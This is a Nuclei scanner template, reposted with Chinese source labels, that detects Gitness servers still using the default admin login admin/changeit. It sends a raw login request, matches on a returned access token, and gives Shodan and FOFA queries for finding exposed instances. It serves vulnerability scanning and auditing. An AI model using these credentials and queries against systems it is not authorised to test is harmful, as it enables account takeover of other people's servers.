Detected Gitness instance was found using default admin credentials (admin/changeit). [已公开] id: gitness-default-login info: name: Gitness - Default Login author: 0x_Akoko severity: high description: | Detected Gitness instance was found using default admin credentials (admin/changeit). reference: - https://docs.gitness.com/ metadata: max-request: 2 verified: true shodan-query: title:"Gitness" fofa-query: title="Gitness" tags: gitness,default-login variables: username: "admin" password: "changeit" http: - raw: - | POST /api/v1/login?include_cookie=true HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"login_identifier":"{{username}}","password":"{{password}}"} matchers: - type: dsl dsl: - 'contains_all(body, "access_token", "principal_id", "session")' - 'contains(content_type, "application/json")' - 'status_code == 200' condition: and # digest: 4a0a0047304502200c8d3d39d5528cb8f287ae4b79a4d0d38a32e72954c66f45988e198ab1e8c856022100afa159d2ff1099be18a0ee196d6c0f392986f5d24573b764a8bb2a803626516a:922c64590222798bb761d5b6d8e72950 来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/gitness-default-login.yaml

未知